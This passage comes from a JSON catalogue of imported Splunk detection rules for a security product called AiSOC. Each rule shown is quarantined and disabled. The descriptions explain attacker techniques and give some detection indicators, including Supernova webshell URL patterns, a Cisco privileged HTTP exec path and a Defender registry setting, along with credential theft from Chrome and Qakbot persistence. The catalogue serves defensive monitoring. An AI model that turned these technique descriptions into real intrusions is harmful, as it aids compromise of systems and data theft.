"splunk/security_content", "source_id": "2c9346f3-bbeb-48ce-8411-fc13d09d83a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_gatekeeper_bypass.yml" } }, { "id": "splunk-security-content-2c9d4f5a-8b6e-4c7f-9d8e-1a2b3c4d5e6f", "type": "detection", "name": "Cisco Privileged Account Creation with HTTP Command Execution", "description": "This analytic correlates risk events between privileged account creation on Cisco IOS devices and HTTP requests to privileged execution paths such as `/level/15/exec/-/*`.\nAPT actors have been observed creating privileged accounts and then running commands on routers via HTTP GET or POST requests that target privileged execution paths.\nThese requests allow attackers to execute commands with the highest privilege level (15) on Cisco devices without requiring interactive SSH access.\nThis correlation identifies when both \"Cisco IOS Suspicious Privileged Account Creation\" and \"Privileged Command Execution via HTTP\" Snort detections fire for the same network device.\nThis behavior indicates an attacker leveraging the newly created account to execute commands remotely via HTTP.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004", "T1136", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-privileged-account-creation-with-http-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c9d4f5a-8b6e-4c7f-9d8e-1a2b3c4d5e6f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 
"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_privileged_account_creation_with_http_command_execution.yml" } }, { "id": "splunk-security-content-2ca1c4a1-8342-4750-9363-905650e0c933", "type": "detection", "name": "Windows Suspicious Driver Loaded Path", "description": "The following analytic detects the loading of drivers from suspicious paths, which is a technique often used by malicious software such as coin miners (e.g., xmrig). It leverages Sysmon EventCode 6 to identify drivers loaded from non-standard directories. This activity is significant because legitimate drivers typically reside in specific system directories, and deviations may indicate malicious activity. If confirmed malicious, this could allow an attacker to execute code at the kernel level, potentially leading to privilege escalation, persistence, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-driver-loaded-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ca1c4a1-8342-4750-9363-905650e0c933", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_driver_loaded_path.yml" } }, { "id": "splunk-security-content-2ce9f31d-ab4f-4179-b2b7-c77a9652e1d8", "type": "detection", "name": "O365 Compliance Content Search Exported", "description": "The following analytic identifies 
when the results of a content search within the Office 365 Security and Compliance Center are exported. It uses the SearchExported operation from the SecurityComplianceCenter workload in the o365_management_activity data source. This activity is significant because exporting search results can involve sensitive or critical organizational data, potentially leading to data exfiltration. If confirmed malicious, an attacker could gain access to and exfiltrate sensitive information, posing a severe risk to the organization's data security and compliance posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-compliance-content-search-exported.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ce9f31d-ab4f-4179-b2b7-c77a9652e1d8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_compliance_content_search_exported.yml" } }, { "id": "splunk-security-content-2cf5cc25-f39a-436d-a790-4857e5995ede", "type": "detection", "name": "Network Connection Discovery With Netstat", "description": "The following analytic detects the execution of `netstat.exe` with command-line arguments to list network connections on a system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and parent processes. This activity is significant as both Red Teams and adversaries use `netstat.exe` for situational awareness and local network-connection discovery (it enumerates the host's own connections and listening ports, not Active Directory). 
If confirmed malicious, this behavior could allow attackers to map network connections, identify critical systems, and plan further lateral movement or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-connection-discovery-with-netstat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2cf5cc25-f39a-436d-a790-4857e5995ede", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_connection_discovery_with_netstat.yml" } }, { "id": "splunk-security-content-2d10095e-05ae-11ec-8fdf-acde48001122", "type": "detection", "name": "Exchange PowerShell Module Usage", "description": "The following analytic detects the usage of specific Exchange Management Shell cmdlets, such as New-MailboxExportRequest, New-ManagementRoleAssignment, New-MailboxSearch, and Get-Recipient. It leverages PowerShell Script Block Logging (EventCode 4104) to identify these cmdlets. This activity is significant because these cmdlets can be abused by adversaries who have gained access via ProxyShell or ProxyNotShell vulnerabilities. 
If confirmed malicious, attackers could export mailbox contents, assign management roles, conduct mailbox searches, or view recipient objects, potentially leading to data exfiltration, privilege escalation, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exchange-powershell-module-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d10095e-05ae-11ec-8fdf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/exchange_powershell_module_usage.yml" } }, { "id": "splunk-security-content-2d4470ef-7158-4b47-b68b-1f7f16382156", "type": "detection", "name": "Windows Suspicious Child Process Spawned From WebServer", "description": "The following analytic identifies the execution of suspicious processes typically associated with WebShell activity on web servers. It detects when processes like `cmd.exe`, `powershell.exe`, or `bash.exe` are spawned by web server processes such as `w3wp.exe` or `nginx.exe`. This behavior is significant as it may indicate an adversary exploiting a web application vulnerability to install a WebShell, providing persistent access and command execution capabilities. 
If confirmed malicious, this activity could allow attackers to maintain control over the compromised server, execute arbitrary commands, and potentially escalate privileges or exfiltrate sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-child-process-spawned-from-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d4470ef-7158-4b47-b68b-1f7f16382156", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_child_process_spawned_from_webserver.yml" } }, { "id": "splunk-security-content-2d4b9e7f-5c3a-4d8e-9b1f-8a6c5e2d4f7a", "type": "detection", "name": "Cisco ASA - User Account Deleted From Local Database", "description": "This analytic detects deletion of user accounts from Cisco ASA devices via CLI or ASDM.\nAdversaries may delete local accounts to cover their tracks, remove evidence of their activities, disrupt incident response efforts, or deny legitimate administrator access during an attack. 
Account deletion can also indicate an attempt to hide the creation of temporary accounts used during compromise.\nThe detection monitors for ASA message ID 502102, which is generated whenever a local user account is deleted from the device, capturing details including the deleted username, privilege level, and the administrator who performed the deletion.\nInvestigate unexpected account deletions, especially those involving privileged accounts (level 15), deletions performed outside business hours, deletions by non-administrative users, or deletions that coincide with other suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531", "T1070.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-user-account-deleted-from-local-database.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d4b9e7f-5c3a-4d8e-9b1f-8a6c5e2d4f7a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___user_account_deleted_from_local_database.yml" } }, { "id": "splunk-security-content-2d8679ef-b075-46be-8059-c25116cb1072", "type": "detection", "name": "O365 User Consent Denied for OAuth Application", "description": "The following analytic identifies instances where a user has denied consent to an OAuth application seeking permissions within the Office 365 environment. This detection leverages O365 audit logs, focusing on events related to user consent actions. 
By filtering for denied consent actions associated with OAuth applications, it captures instances where users have actively rejected permission requests. This activity is significant as it may indicate users spotting potentially suspicious or unfamiliar applications. If confirmed malicious, it suggests an attempt by a potentially harmful application to gain unauthorized access, which was proactively blocked by the user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-user-consent-denied-for-oauth-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d8679ef-b075-46be-8059-c25116cb1072", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_user_consent_denied_for_oauth_application.yml" } }, { "id": "splunk-security-content-2dbeee3a-f067-11eb-96c0-acde48001122", "type": "detection", "name": "Rundll32 Create Remote Thread To A Process", "description": "The following analytic detects the creation of a remote thread by rundll32.exe into another process. It leverages Sysmon EventCode 8 logs, specifically monitoring SourceImage and TargetImage fields. This activity is significant as it is a common technique used by malware, such as IcedID, to execute malicious code within legitimate processes, aiding in defense evasion and data theft. 
If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, escalate privileges, and exfiltrate sensitive information from the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-create-remote-thread-to-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2dbeee3a-f067-11eb-96c0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_create_remote_thread_to_a_process.yml" } }, { "id": "splunk-security-content-2dd719ac-3021-11ec-97b4-acde48001122", "type": "detection", "name": "Disable Defender BlockAtFirstSeen Feature", "description": "The following analytic detects the modification of the Windows registry to disable the Windows Defender BlockAtFirstSeen feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender SpyNet and the DisableBlockAtFirstSeen value. This activity is significant because disabling this feature can allow malicious files to bypass initial detection by Windows Defender, increasing the risk of malware infection. 
If confirmed malicious, this action could enable attackers to execute malicious code undetected, leading to potential system compromise and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-blockatfirstseen-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2dd719ac-3021-11ec-97b4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_blockatfirstseen_feature.yml" } }, { "id": "splunk-security-content-2de3d5b8-a4fa-45c5-8540-6d071c194d24", "type": "detection", "name": "Detect Port Security Violation", "description": "The following analytic detects port security violations on Cisco switches. It leverages logs from Cisco network devices, specifically looking for events with mnemonics indicating port security violations. This activity is significant because it indicates an unauthorized device attempting to connect to a secured port, potentially bypassing network access controls. 
If confirmed malicious, this could allow an attacker to gain unauthorized access to the network, leading to data exfiltration, network disruption, or further lateral movement within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-port-security-violation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2de3d5b8-a4fa-45c5-8540-6d071c194d24", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_port_security_violation.yml" } }, { "id": "splunk-security-content-2e155547-aaac-49d3-b0ef-ceabc31fd364", "type": "detection", "name": "ESXi VM Exported via Remote Tool", "description": "This detection identifies the use of a remote tool to download virtual machine disk files from a datastore. 
The NFC protocol is used by management tools to transfer files to and from ESXi hosts, but it can also be abused by attackers or insiders to exfiltrate full virtual disk images.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-vm-exported-via-remote-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e155547-aaac-49d3-b0ef-ceabc31fd364", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_vm_exported_via_remote_tool.yml" } }, { "id": "splunk-security-content-2e58a4ff-398f-42f4-8fd0-e01ebfe2a8ce", "type": "detection", "name": "Linux Node Privilege Escalation", "description": "The following analytic identifies the execution of Node.js with elevated privileges using sudo, specifically when spawning child processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific Node.js commands. This activity is significant because running Node.js as a superuser without dropping privileges can allow unauthorized access to the file system and potential privilege escalation. 
If confirmed malicious, this could enable an attacker to maintain privileged access, execute arbitrary code, and compromise sensitive data within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-node-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e58a4ff-398f-42f4-8fd0-e01ebfe2a8ce", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_node_privilege_escalation.yml" } }, { "id": "splunk-security-content-2e65afe0-9a75-4487-bd87-ada9a9f1b9af", "type": "detection", "name": "Windows Credentials from Password Stores Chrome Extension Access", "description": "The following analytic detects non-Chrome processes attempting to access the Chrome extensions file. It leverages Windows Security Event logs, specifically event code 4663, to identify this behavior. This activity is significant because adversaries may exploit this file to extract sensitive information from the Chrome browser, posing a security risk. 
If confirmed malicious, this could lead to unauthorized access to stored credentials and other sensitive data, potentially compromising the security of the affected system and broader network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-extension-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e65afe0-9a75-4487-bd87-ada9a9f1b9af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_extension_access.yml" } }, { "id": "splunk-security-content-2e765c1b-144a-49f0-93d0-1df4287cca04", "type": "detection", "name": "Windows System Discovery Using Qwinsta", "description": "The following analytic detects the execution of \"qwinsta.exe\" on a Windows operating system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. The \"qwinsta.exe\" tool is significant because it can display detailed session information on a remote desktop session host server. This behavior is noteworthy as it is commonly abused by Qakbot malware to gather system information and send it back to its Command and Control (C2) server. 
If confirmed malicious, this activity could lead to unauthorized data exfiltration and further compromise of the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-discovery-using-qwinsta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e765c1b-144a-49f0-93d0-1df4287cca04", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_discovery_using_qwinsta.yml" } }, { "id": "splunk-security-content-2e768497-04e0-4188-b800-70dd2be0e30d", "type": "detection", "name": "Windows Modify Registry Qakbot Binary Data Registry", "description": "The following analytic detects the creation of a suspicious registry entry by Qakbot malware, characterized by 8 random registry value names with encrypted binary data. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications under the \"SOFTWARE\\\\Microsoft\\\\\" path by processes like explorer.exe. This activity is significant as it indicates potential Qakbot infection, which uses the registry to store malicious code or configuration data. 
If confirmed malicious, this could allow attackers to maintain persistence and execute arbitrary code on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-qakbot-binary-data-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e768497-04e0-4188-b800-70dd2be0e30d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml" } }, { "id": "splunk-security-content-2e891cbe-0426-11ec-9c9c-acde48001122", "type": "detection", "name": "GetLocalUser with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-LocalUser` PowerShell commandlet using PowerShell Script Block Logging (EventCode=4104). This commandlet lists all local users on a system. The detection leverages script block text from PowerShell logs to identify this activity. Monitoring this behavior is significant as adversaries and Red Teams may use it to enumerate local users for situational awareness and Active Directory discovery. 
If confirmed malicious, this activity could lead to further reconnaissance, enabling attackers to identify potential targets for privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getlocaluser-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e891cbe-0426-11ec-9c9c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getlocaluser_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-2eba3d36-14a6-11ec-a682-acde48001122", "type": "detection", "name": "MS Scripting Process Loading WMI Module", "description": "The following analytic detects the loading of WMI modules by Microsoft scripting processes like wscript.exe or cscript.exe. It leverages Sysmon EventCode 7 to identify instances where these scripting engines load specific WMI-related DLLs. This activity is significant because it can indicate the presence of malware, such as the FIN7 implant, which uses JavaScript to execute WMI queries for gathering host information to send to a C2 server. 
If confirmed malicious, this behavior could allow attackers to collect sensitive system information and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ms-scripting-process-loading-wmi-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2eba3d36-14a6-11ec-a682-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ms_scripting_process_loading_wmi_module.yml" } }, { "id": "splunk-security-content-2ec08a09-9ff1-4dac-b59f-1efd57972ec1", "type": "detection", "name": "Supernova Webshell", "description": "The following analytic detects the presence of the Supernova webshell, used in the SUNBURST attack, by identifying specific patterns in web URLs. The detection leverages Splunk to search for URLs containing \"*logoimagehandler.ashx*codes*\", \"*logoimagehandler.ashx*clazz*\", \"*logoimagehandler.ashx*method*\", and \"*logoimagehandler.ashx*args*\". This activity is significant as it indicates potential unauthorized access and arbitrary code execution on a compromised system. If confirmed malicious, this could lead to data theft, ransomware deployment, or other severe outcomes. 
Immediate steps include reviewing the web URLs, inspecting on-disk artifacts, and analyzing concurrent processes and network connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/supernova-webshell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ec08a09-9ff1-4dac-b59f-1efd57972ec1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/supernova_webshell.yml" } }, { "id": "splunk-security-content-2ed89ba9-c6c7-46aa-9f08-a2a1c2955aa3", "type": "detection", "name": "Windows SqlWriter SQLDumper DLL Sideload", "description": "The following analytic detects the abuse of SqlWriter and SQLDumper executables to sideload the vcruntime140.dll library. It leverages Sysmon EventCode 7 logs, focusing on instances where SQLDumper.exe or SQLWriter.exe load vcruntime140.dll, excluding legitimate loads from the System32 directory. This activity is significant as it indicates potential DLL sideloading, a technique used by adversaries to execute malicious code within trusted processes. 
If confirmed malicious, this could allow attackers to execute arbitrary code, maintain persistence, and evade detection by blending with legitimate processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sqlwriter-sqldumper-dll-sideload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ed89ba9-c6c7-46aa-9f08-a2a1c2955aa3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sqlwriter_sqldumper_dll_sideload.yml" } }, { "id": "splunk-security-content-2ed8b538-d284-449a-be1d-82ad1dbd186b", "type": "detection", "name": "Creation of Shadow Copy with wmic and powershell", "description": "The following analytic detects the creation of shadow copies using \"wmic\" or \"Powershell\" commands. It leverages the Endpoint.Processes data model in Splunk to identify processes where the command includes \"shadowcopy\" and \"create\". This activity is significant because it may indicate an attacker attempting to manipulate or access data in an unauthorized manner, potentially leading to data theft or manipulation. 
If confirmed malicious, this behavior could allow attackers to back up and exfiltrate sensitive data or hide their tracks by restoring files to a previous state after an attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/creation-of-shadow-copy-with-wmic-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ed8b538-d284-449a-be1d-82ad1dbd186b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml" } }, { "id": "splunk-security-content-2eed004c-4c0d-11ec-93e8-3e22fbd008af", "type": "detection", "name": "Wsmprovhost LOLBAS Execution Process Spawn", "description": "The following analytic identifies `Wsmprovhost.exe` spawning a LOLBAS execution process. It leverages Endpoint Detection and Response (EDR) data to detect when `Wsmprovhost.exe` spawns child processes that are known LOLBAS (Living Off the Land Binaries and Scripts) executables. This activity is significant because it may indicate an adversary using Windows Remote Management (WinRM) to execute code on remote endpoints, a common technique for lateral movement. 
If confirmed malicious, this could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wsmprovhost-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2eed004c-4c0d-11ec-93e8-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-2f0604c6-6030-11eb-ae93-0242ac130002", "type": "detection", "name": "AWS SAML Update identity provider", "description": "The following analytic detects updates to the SAML provider in AWS. It leverages AWS CloudTrail logs to identify the `UpdateSAMLProvider` event, analyzing fields such as `sAMLProviderArn`, `sourceIPAddress`, and `userIdentity` details. Monitoring updates to the SAML provider is crucial as it may indicate a perimeter compromise of federated credentials or unauthorized backdoor access set by an attacker. 
If confirmed malicious, this activity could allow attackers to manipulate identity federation, potentially leading to unauthorized access to cloud resources and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-saml-update-identity-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f0604c6-6030-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_saml_update_identity_provider.yml" } }, { "id": "splunk-security-content-2f15e1a4-0fc2-49dd-919e-cbbe60699218", "type": "detection", "name": "Windows Scheduled Task with Highest Privileges", "description": "The following analytic detects the creation of a new scheduled task with the highest execution privileges via Schtasks.exe. It leverages Endpoint Detection and Response (EDR) logs to monitor for specific command-line parameters ('/rl' and 'highest') in schtasks.exe executions. This activity is significant as it is commonly used in AsyncRAT attacks for persistence and privilege 